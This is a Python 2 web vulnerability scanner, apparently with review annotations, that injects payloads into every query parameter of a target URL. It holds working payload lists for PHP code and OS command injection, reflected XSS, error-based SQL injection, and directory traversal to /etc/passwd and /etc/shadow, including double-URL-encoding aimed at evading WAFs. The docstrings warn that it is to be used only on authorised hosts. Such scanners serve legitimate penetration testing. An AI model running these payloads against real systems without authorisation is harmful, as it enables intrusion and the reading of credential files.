#!/usr/bin/env python
import re, urllib, time, requests, os, sys, urllib, urllib2, socket
from urllib import FancyURLopener
from designer import *
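def Pentest(url, payloads, vuln):
    """Inject every payload into every query parameter of ``url`` and report hits.

    For each ``name=value`` pair in the query string, each payload is appended
    to that pair (the other parameters are left untouched), the mutated URL is
    fetched through ``useragent`` and the response is scanned line by line for
    ``vuln``.  A payload counts as one finding the first time any line
    matches; the payload and the exact request URL are printed as proof of
    concept and a summary line closes the run.

    Args:
        url: Target URL.  It must carry a query string (``?a=1&b=2``).
        payloads: Iterable of payload strings, sent verbatim (callers encode
            them as they want them on the wire).
        vuln: Compiled regex (or pattern string) identifying a vulnerable
            response line.

    Returns:
        None.  Results are printed only.

    Raises:
        ValueError: if ``url`` has no query string (the original raised a bare
            IndexError from ``url.split("?")[1]``).

    Notes:
        * This sends attack traffic; only point it at hosts you are authorised
          to test.
        * ``useragent`` and ``COLOR`` come from ``designer`` (star import);
          ``useragent`` is presumably a FancyURLopener-style object whose
          ``open(url)`` returns a file-like response — confirm in designer.py.
        * The module is Python 2 (``urllib.urlopen``, ``urllib2``); ``print``
          is called with a single parenthesised argument so the lines parse
          under both 2 and 3.
    """
    # WebKnight answers blocked requests with HTTP status 999.  The original
    # compared the int status against the string '999', which is never true,
    # so the WAF notice could not fire.
    probe = urllib.urlopen(url)
    try:
        blocked_by_waf = probe.code == 999
    finally:
        probe.close()
    if blocked_by_waf:
        print(COLOR.green + "WebKnight WAF" + COLOR.die + " Detected.")
        time.sleep(3)

    if "?" not in url:
        raise ValueError("URL has no query string to inject into: %s" % url)
    base, query = url.split("?", 1)
    params = query.split("&")

    vulnerabilities = 0
    for index, param in enumerate(params):
        for payload in payloads:
            # Rebuild the query instead of str.replace() on the whole URL so a
            # parameter whose text also appears elsewhere (e.g. "id=1" inside
            # "pid=1") is not mangled.
            mutated = list(params)
            mutated[index] = param + str(payload).strip()
            bugs = base + "?" + "&".join(mutated)
            request = useragent.open(bugs)
            try:
                html = request.readlines()
            finally:
                request.close()  # urllib responses are file-like; release the socket
            for line in html:
                # Truthiness of the match list.  The original tested
                # len(...) != '0' (int vs str), which is always true and
                # flagged every line of every response as a finding.
                if re.findall(vuln, line):
                    print("[+] Payload: " + COLOR.green + "{0}".format(payload) + COLOR.die)
                    print("[+] Proof of Concept: " + COLOR.green + "{0}".format(bugs) + COLOR.die)
                    vulnerabilities += 1
                    break  # one finding per payload, not one per matching line

    # int comparison; the original compared against the string '0'.
    if vulnerabilities == 0:
        print("[+] Every Payload is Being Properly Escaped.")
    else:
        print("\n[-] Target is Vulnerable to: " + COLOR.green + "{0}".format(vulnerabilities) + COLOR.die + " :Vulnerabilities.")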
def RemoteCodeExecution(url):
    """Probe ``url`` for remote code / command execution (prints only).

    Pushes PHP expression-injection payloads, a double-URL-encoded copy of one
    of them, and plain OS-command payloads through ``Pentest``; a response is
    flagged when it carries the hash the PHP payloads print (presumably
    md5("UrduSecurity")), a Linux ``uname`` banner, phpinfo()-style markers
    or a Windows ``dir`` / ``boot.ini`` listing.

    NOTE(review): "Linux" and "eval()" are loose markers — any page that
    merely mentions them is reported.  Treat hits as leads to verify by hand.
    """
    rule = COLOR.green + "+++" * 16 + COLOR.die
    print(rule)
    print(COLOR.green + "-- Checking Remote Code Execution --" + COLOR.die)
    print(rule)
    payloads = [
        ';${@print(md5(UrduSecurity))}',
        ';${@print(md5("UrduSecurity"))}',
        # Double-URL-encoded variant of the previous payload, aimed at WAFs
        # that decode the request only once before inspecting it.
        '%253B%2524%257B%2540print%2528md5%2528%2522UrduSecurity%2522%2529%2529%257D%253B',
        ';uname;',
        '&&dir',
        '&&type C:\\boot.ini',
        ';phpinfo();',
        ';phpinfo',
    ]
    markers = re.compile(
        r"51107ed95250b4099a0f481221d56497|Linux|eval\(\)|SERVER_ADDR|Volume.+Serial|\[boot",
        re.I,
    )
    Pentest(url, payloads, markers)
def XssTest(url):
    """Probe ``url`` for reflected cross-site scripting (prints only).

    Three payloads break out of a single-quoted attribute, a double-quoted
    attribute, or plain text and inject ``<svg/onload=confirm(/UrduSecurity/)>``;
    a fourth (``x"x>x``) checks whether quotes and angle brackets are echoed
    back unencoded.  A hit is the injected markup reflected verbatim in the
    response body.  Payloads are sent URL-encoded; the markers are matched
    against the raw response.
    """
    rule = COLOR.green + "+++" * 16 + COLOR.die
    print(rule)
    print(COLOR.green + "-- Checking Cross Site Scripting --" + COLOR.die)
    print(rule)
    svg_probe = 'UrduSecurity%3Csvg%2Fonload%3Dconfirm%28%2FUrduSecurity%2F%29%3Eweb'
    payloads = [
        '%27%3E' + svg_probe,   # '>  -- escape from a single-quoted attribute
        '%78%22%78%3e%78',      # x"x>x -- quote / angle-bracket encoding check
        '%22%3E' + svg_probe,   # ">  -- escape from a double-quoted attribute
        svg_probe,              # bare tag injection into a text context
    ]
    reflected = re.compile('UrduSecurity<svg|x>x', re.I)
    Pentest(url, payloads, reflected)
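def ErrBsdSQLi(url):
    """Probe ``url`` for error-based SQL injection (prints only).

    Appends quote / backslash / bracket sequences to each query parameter and
    flags responses that echo a database error: MySQL ("You have an error in
    your SQL"), MSSQL ("Incorrect syntax", "Unclosed quotation mark"),
    PostgreSQL ("unterminated quoted string") and generic ODBC / PHP errors.

    Fix: the PostgreSQL marker was misspelled ``unterminated.+qoute`` and
    could never match a real error; it now reads ``unterminated.+quote``.

    NOTE(review): ``Fatal.+error`` matches any PHP fatal error, SQL-related or
    not — verify hits manually before reporting.
    """
    print(COLOR.green + "+++" * 16 + COLOR.die)
    print(COLOR.green + "-- Checking Error Based SQLi --" + COLOR.die)
    print(COLOR.green + "+++" * 16 + COLOR.die)
    payloads = [
        "3'",
        "3%5c",                 # 3\  -- backslash escapes the closing quote
        "3%27%22%28%29",        # 3'"()
        "3'><",
        # Mixed quote/bracket/CRLF/null/overlong-UTF-8 soup to trip lax parsers
        "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27",
    ]
    vuln = re.compile(
        r"You have an error in your SQL|Incorrect syntax|Syntax error|Unclosed.+mark|unterminated.+quote|SQL.+Server|Microsoft.+Database|Fatal.+error",
        re.I,
    )
    Pentest(url, payloads, vuln)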
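def dirTrans(url, max_depth=22):
    """Probe ``url`` for directory traversal / local file read (prints only).

    Args:
        url: Target URL with a query string.
        max_depth: Deepest ``../`` chain to try.  The default (22) reproduces
            the original hand-written payload list exactly.

    Payload order (unchanged from the original list): absolute and relative
    ``passwd`` / ``master.passwd`` paths, then for each depth 1..max_depth
    ``../`` * depth + ``etc/passwd`` with and without a trailing ``%00``
    (null-byte truncation, only effective on old back ends that stop at NUL),
    and finally ``etc/shadow%00`` at the deepest level.

    Detection: a ``root`` entry from the fetched passwd file.  The original
    marker ``root.*bash$`` only fires when root's shell is bash, so the
    uid/gid-0 signature ``root:.*:0:0:`` is accepted as well (sh/csh/zsh
    roots, BSD master.passwd, Alpine).  ``$`` still matches before the
    trailing newline that ``readlines()`` leaves on each line.
    """
    print(COLOR.green + "+++" * 16 + COLOR.die)
    print(COLOR.green + "-- Checking For Directory Traversal --" + COLOR.die)
    print(COLOR.green + "+++" * 16 + COLOR.die)
    payloads = [
        '/etc/master.passwd',
        '/master.passwd',
        'etc/passwd',
        'etc/shadow%00',
        '/etc/passwd',
        '/etc/passwd%00',
    ]
    for depth in range(1, max_depth + 1):
        prefix = '../' * depth
        payloads.append(prefix + 'etc/passwd')
        payloads.append(prefix + 'etc/passwd%00')
    payloads.append('../' * max_depth + 'etc/shadow%00')
    vuln = re.compile(r'root.*bash$|root:.*:0:0:', re.I)
    Pentest(url, payloads, vuln)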